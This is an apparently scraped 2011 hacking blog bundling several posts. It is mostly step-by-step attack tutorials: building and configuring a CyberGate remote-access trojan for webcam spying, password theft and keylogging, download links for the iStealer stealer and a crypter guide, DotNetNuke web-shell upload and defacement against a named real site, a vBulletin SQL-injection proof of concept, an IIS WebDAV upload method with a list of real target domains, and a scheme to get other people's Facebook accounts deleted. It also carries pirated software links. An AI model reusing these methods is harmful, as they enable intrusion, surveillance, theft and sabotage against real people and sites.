Thursday 29 September 2011

CyberGate Setup Tutorial How to Hack Computer Pc using CyberGate Rat (Remote Administrator Tool) [detailed+pics]

Hi Friends Welcome here and i work hard for this tutorial this is full Tutorial for using Rat i had search alot about it and made this Content so Enjoy it,,,,,



What is CyberGate Rat and How its Works?

the Little definition about rat is this, Rat is a Computer Pc Remote hacking tool 1st we have to build our torjan file and after need to send this to victim. when Victim will open it,, after cybergate rat will show u that your victim is online you can see him/her by his web cam without permission and also can see passwords of computer


Requirements:

Download this Rat Tool Click Here 
Download Duc No-ip Client



  • Window xp/7/8/Vista
  • Disable your pc Antivirus
  • Disable your pc FireWall
Now Lets Start Tutorial



Step 1:  Create a Free Account in No-ip.com

This is How to Make Account in No-ip.com if you made or now already then skip this step
  1. Go here http://www.no-ip.com/newUser.php 
  2. Enter All the Requirements in fields
  3. Sure that use Gmail id for signup
  4. Click on Accept and Create my Account
  5. For Example look screenshot below

       

          
  1.  Now Choose your Operating System
  2. if you are using window xp/7/vista then choose window
  3. For Example i choosed window see screenshot below


  • After login to your gmail account and Confirm Your Account
  • After Login to your No-Ip Account
So this is We Have done account making in No-ip



Step2 Add/Create a Host in your No-ip account



  • So Enter Host InforMation and Create it
  • For Example see Screenshot below




Step 3: Download Duc and how to use it


Step 4: How to Setup CyberGate Rat


  • Download CyberGate 1.07 
  • Extaract it into your pc
  • Open cyberGate Client
  • When It’s Open, Press: Control Center -> Start.
  • Press: Control Center -> Options -> Select Listening Ports

Firstly, Write “100″ In That Little Box And Press The Blue Arrow. Then It Should Appear Under “Active Ports”Active Ports: The Port You Will Forward Later!Connections Limit: The Max Amount Of Victims You Can Have.Connection PW: The Connection Password. Use “123456″
[V] Show Password: (Shows Password)
Once This Is Done, Press “Save”!
6. Now We’ll Go To The: Control Center -> Build -> Create Server.


User: First, Press “New” And Name It To: “Plutonium”. Once Done, Press “OK”
Now Just Double Click On “Plutonium” Or Press “Plutonium” And Then Press “Forward”
7. Now We’re In The “Connection” Tab.


First, Press “127.0.0.1 – 999″ And Then Press Delete.
Now Press “Add” And Write Your Hostname In It + :100.
Like This:
Quote:YourHostName.No-ip.biz:100
Change The Identification To: Cyber
Change The PW To: 123456
**Note, If You Want To Try The Server On Yourself, Then Delete Both:
- 127.0.0.1:999
- YourHostName.No-ip.biz
And Replace Them With; 127.0.0.1:100 Since 127.0.0.1 Means “Local Computer & LAN Internet”
Make The DNS/HostName Server First Though! :)
DNS: Your Host Name, EG:
Quote:YourHostName.no-ip.biz
Port: The Port You Will Forward Later.
Identification: The Victim Name
PW: The Password You Wrote In The Options, “123456″
8. Once You’re Done With Theese, You’ll Move On To The “Installation” Tab.



9. Have The Same Settings As I Do, And Follow The Instructions In The Image!
–//–//–//–//–//–//
Install Directory: Where The Server Installs,
%System%
%Windows%
%Root%
%Program Files%
%Other%
Use The “System”! :) .
Boot: This Is The “Startup” Option. Have Everything Checked & Press “Random” 5 Times And It Will Startup On Your Victim Everytime They Start Their Computer!
Directory: Where The Virus Folder Installs
File Name: What The File Will Be Inside The Folder.
Inject Into. What Process It Injects into, Use Svchost.exe!
[V] Persistance: Keeps Trying To Inject Until Succed.
[V] Hide File: Hides The File, (Not FUD Though!)
[V] CCD: Changes The Creation Date From 16th July To 4 September 2005.
Mutex: Mutex Of The Server, Just Press Random A Couple Of Times!
There We Go, You’ve Now Completed The “Installation” Tab!
–/ Skip The Message & Keylogger Since They Are Pre-Set Already!
10. You Should Now Have Trumbled Into The “Antis” Tab, Have Everything Checked! (Except SANDBOXIE If You Are Gonna TRY IT ON YOURSELF!)


Ok, The Final Tab.. “Creation Of The Server”. Have Every Setting As Me!


Thats it guyz

 This Tutorial Post By : MaHeR_BrO


Wednesday 28 September 2011

Download Istealer 6.3 legands with php logger


Download Istealer 6.3 legands with php logger



In this Post This is Great working post friends
You can bind your files with Torjan




Download Istealer 6.3

http://oron.com/si1u072bsfrk/iStealer_6.3.rar.html


Download Kaspersky Internet Security 2012 + 60 Days Activation Key


Download Kaspersky Internet Security 2012 + 60 Days Activation Key


Kaspersky Internet Security KIS 2012 has been released by Kaspersky Lab. Kaspersky Antivirus new 2012 provides real-time protection from lates malware and viruses. Supported by intelligent scaning and regular update that will proactively secure your computer. Kaspersky internet security 2012 new promising protection from viruses, trojan, spam, hacker,etc digital security features base technology with advanced antivirus protection. This ensures your online security as you work, bank, shop and play online.







Kaspersky Internet Security 2012 Key Features:
  • Protects from viruses, Trojans and worms
  • Blocks spyware and adware
  • Scans files in real time (on access) and on demand
  • Scans email messages (regardless of email client)
  • Scans Internet traffic (regardless of browser)
  • Protects instant messengers (ICQ, MSN)
  • Provides proactive protection from unknown threats
  • Scans Java and Visual Basic scripts
The official Kaspersky website usually provides free trial for one month only, but there is a promotion offer to get a free copy of Kaspersky Internet Security 2012 that protect you for 2 months (60 days). Visit here : Kaspersky Internet Security 2012 Promo Page.

Download : Kaspersky Internet Security KIS 2012

Crypter Making Guide Download the crypterblueprint book for free crypters.net Ebook Leaked :D


Crypter Making Guide Download the crypterblueprint book for free crypters.net Ebook Leaked :D

 

So Guyz You want This Book Free :D

You can check This Book is not Free

Official Site : http://crypters.net/crypter-blueprint/

But on My Site You Will get it Free

Just Click On the Download Button Below and get it for download free

Download Now


                                                                      


MicroSoft Office 2010 include Key and Toolkit New Version Free Downnload


MicroSoft Office 2010 include Key and Toolkit New Version Free Downnload











Microsoft Word 2010
Microsoft Excel 2010
Microsoft Outlook 2010 with Business Contact Manager
Microsoft PowerPoint 2010
Microsoft OneNote 2010
Microsoft Access 2010
Microsoft SharePoint Workspace 2010
Microsoft InfoPath 2010
Microsoft Publisher 2010
Microsoft Office Web Apps
Microsoft Communicator
Integrated solution capabilities such as enterprise content management (ECM), electronic forms, and information rights and policy capabilities



Download Links Below (Total Size 700 Mb No passwords for File) 100% working
  1. http://www.wupload.com/file/200601957
  2. http://www.wupload.com/file/200628898
  3. http://www.wupload.com/file/200793392
  4. http://www.wupload.com/file/200960306
  5. http://www.wupload.com/file/201096781
  6. http://www.wupload.com/file/200558486
  7. http://www.wupload.com/file/200577939

Monday 26 September 2011

DNN Method Complete Tutorial How To

There Is Some Simple Steps For DNN Hacking

First Of ALL

Download This Shell

Step 1 : 
http://www.google.com

Step 2:Now enter this dork (this is Dork for find DNN Valn sites)




:inurl:/tabid/36/language/en-US/Default.aspx
        or
   inurl:/Fck/fcklinkgallery.aspx




this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3: 
it will show you many sites, Copy any one of site.

Step 4: 
For example take this site.
Example:



http://www.itservicespro.net
Step 5: Now Paste after the site url

  this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

so Site is this : 
http://itservicespro.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

so it will look like this (screenshot below)


Note:  if it will show you like this (see screenshot below) its mean site could not hack find another site


                              
Now Click on File ( A File On Your Site )
Step 8:Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')
Step 9:You will Find the Upload Option
Step 10:
Select Root

Step 11:
Upload your shell ASp Download it here

After upload 
go for your shell  www.yoursite.com/portals/0/yourshellname.asp;.jpg
EXample : http://www.itservicespro.net/portals/0/umer.asp;.jpg
so you upload shell and shell is front of you look like this (screenshot below)
Click on <Dir>...  again and again till you will see admin


so when it will show you this page admin area page click on UPLOAD FILE TO C:\WEBSITES\WWW.ITSERVICESPRO.NET\WEBSITE\
and upload your deface index page so
this is your result www.site.com/urpagename.html
for example see this http://www.itservicespro.net/umer.html 

If  you want to deface main page then click on Admin dir and search for index htm or html and click on Edit and copy your deface page code and replace there...:)
thats it (Tutorial by Umer Rock)
All this for Educational purpose

vBulletin 4.0.x (Search) SQLi / Cross-Site Request Scripting


vBulletin 4.0.x (Search) SQLi / Cross-Site Request Scripting




###
# Title : vBulletin 4.0.x (Search) SQLi via Cross-Site Request Scripting

# platform : php
# Impact : Remote SQL Injection Via Cross-Site Request Scripting (CSRF/XSRF = SQLi)
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] & [Mac OS X 10.6.1] & [BSDi-BSD/OS 4.2]

# (!) Vulnerability Details :

+> Real Provider By : D4rkB1t (d4rkb1t@live.com) | << Thanks For This Great Vulnerability Br0 (^_^)
+> References : [http://1337day.com/exploits/16147]
+> Video (By D4rkB1t) : [http://www.youtube.com/watch?v=fR9RGCqIPkc]

>> You'r Can use the exploit via Cross-Site Request Scripting or Request Forgery ,
> The vulnerability About (SQLi) in method 'post' at Page Search.php - So he is can able CSRF/XSRF


# Proof Of Concept (f.eg) :

<form action="http://localhost/search.php?do=process" method="post" name="vbform" id="searchform">
<input type="hidden" name="type[]" value="7" />
<input type="hidden" id="keyword" class="textbox" name="query" tabindex="1" value="[! Group Name !]" />
<input type="hidden" name="searchuser" id="userfield_txt" tabindex="1" value="" />
<input type="hidden" name="exactname" value="1" id="cb_exactname" tabindex="1" />
<input type="hidden" class="textbox primary popupctrl" name="tag" id="tag_add_input" tabindex="1" value="" />
<input type="submit" class="button" name="dosearch" value="Search Now" tabindex="1" accesskey="s"/>
<input type="hidden" name="s" value="" />
<input type="hidden" name="securitytoken" value="[ T0ken 4 Security ]" />
<input type="hidden" name="do" value="process" />
<input type="hidden" name="searchthreadid" value="&cat[0]=1) SQLi-Code-Here" />
</form>

POST Data [ HTTP dbg ] =

<!--
type[]=7&query=[Group-Name]&searchuser=&exactname=1&tag=&dosearch=Search+N ow
&s=&securitytoken=[Sec-Token]&do=process&searchthreadid=[SQL-Inj3cTi0n-Here]
-->



assassian.h4ck3rs@gmail.com

How To Hack A Web With IIS Exploit [Tutorial] ( For Window xp )

In IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest  way to Hack any site.

STEP 1: Click on Start button and open "RUN".






STEP 2: Now Type  this in RUN

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}



Now A Folder named "Web Folders" will open.


STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".



STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".


STEP 5: Now Click on "Finish"




STEP 6: Now the folder will appear. You can open it and put any deface page or anything.





STEP 7: I put  text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.


Now to view the uploaded site i will go to "http://autoqingdao.com/securityalert.txt"
In your case it will be " www.[sitename].com/[file name that you uploaded] "

http://91shengdian.com/
http://admella.org.au/
http://byerdental.com/
http://ccteam.org/
dedicated-servers-host.com
ewu-2.com
fordmanuals.com
freedownload-360.com
fromdesign.net
gratismp3musik.com
ibdco.co.in
idoubao.com
jax.yb.gov.cn
qd15.net
shhfgl.tzsb.cn
stb.mjpru.ac.in
stonespub.com.au
thienly.vn
tieuhocdongphu.edu.vn
whst1998.tzsb.cn
www.ajaymetachem.com
www.arizonahost.com
www.bdktv.com
www.bix.bh
www.cibits.com
www.csscsystems.com
http://lumjsoft.com/ 
http://coachcall.com.cn/ 
http://shanzhaipc.org/ 
http://dataio.com/ 
http://gogou.org/ 
http://huhao.org/ 
http://zgxlzxw.com/ 
http://blsfw.com/ 
http://byerdental.com/ 
http://cibits.com/ 
http://315pu.com/ 
http://250360.com/ 
http://aspirantsouls.com/ 
http://authorswritenow.com/ 
http://bjname.com/ 
http://yjwz.cn/
www.cyqxj.com
www.hi3j.com
www.esneh.com
www.esguolu.com
www.duanxinsms.net
www.dspenglian.com
www.dabaozang.com
www.cytsgx.com
www.hljycm.com

www.huhao.org

www.jxkarei.com
www.ltjcy.gov.cn
www.neostarinfra.com
www.quangbinh-eza.gov.vn
www.safetyinspector.buildsafer.com
xyyjy.org
www.zcky.com

Top Ten HaCking Tools

Click Here To Download 



assassian.h4ck3rs@gmail.com

Sunday 25 September 2011

delete your facebbook account


delete your facebbook account

click this link and delete your facebbook account

https://www.facebook.com/help/contac...delete_account

How To Get Any FaceBook Account Banned/Removed [TUT]


How To Get Any FaceBook Account Banned/Removed [TUT]

[size=small]
This works i (88power88) have used this and had like 10 accounts removed within 2 weeks.

WHAT YOU ALL NEED?

1. The victim's link to his profile
2. his / her email
3. Date of Birth
4. create a gmail or yahoo mail from the victim by name

How to delete?

1. go to this page:
[hide]
Code:
http://www.facebook.com/help/contact.php?show_form=hack_nologin_access
[/hide]
2. insert details. The area of 'e-mail address where you can be contacted' enter fake email that you have made

3. you will get a reply from the facebook team you tell them you do not have access to your facebook account that the hacker enters a regular basis to your account
and after a few days will arrive reply from them asking if you still have pristum account
You do not have to answer them the same day or the next will delete account
[/size]

Send Self Destructing Emails ! !


Send Self Destructing Emails ! !

You might remember the world famous scene of Mission Impossible in which after the message has been heard once the message destroys itself. Now it is possible for everybody to have such facility. You can send an E-mail which destroys itself after it has been read once.



Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient’s inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?


Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that’s already been sent or read. Don’t leave your messages sitting in peoples’ inboxes forever. Get a free BigString email account to protect your privacy.


BigString takes the risk out of email


Now, with BigString, you can finally take the risk out of email and put an end to “sender regret.” It is the world’s first & only email service that thoroughly protects your safety and privacy.
BigString’s exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else’s inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can’t be posted to unseemly web sites or printed for circulation amongst total strangers.




BigString lets you have second thoughts


BigString shifts the control from the recipient to YOU the sender. BigString grantsthe luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.


You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.


BigString takes the danger out of clicking


BigString guarantees that clicking “send” will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they’ve been opened! The freedom is yours, the options are yours, and you’re the boss with BigString.


BigString is easy to use


BigString is as easy to use as any other email and there’s nothing to download! Don’t be resigned to the mercy of your recipient. You don’t want your every action to be carved in stone because sometimes you just NEED to take it back!


Here are just a few of the many applications of BigString Erasable, Recallable, Non-Printable Email.
Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even “pull an email back” to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.


On-Line Daters: You don’t want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you’ll allow a picture to be viewed before it disappears. BigString protects your privacy!


Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later usewithout your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!


Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking “send” is no longer an action “carved in stone.” Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You’re the boss with BigString.


Get a Free Account from (http://www.bigstring.com )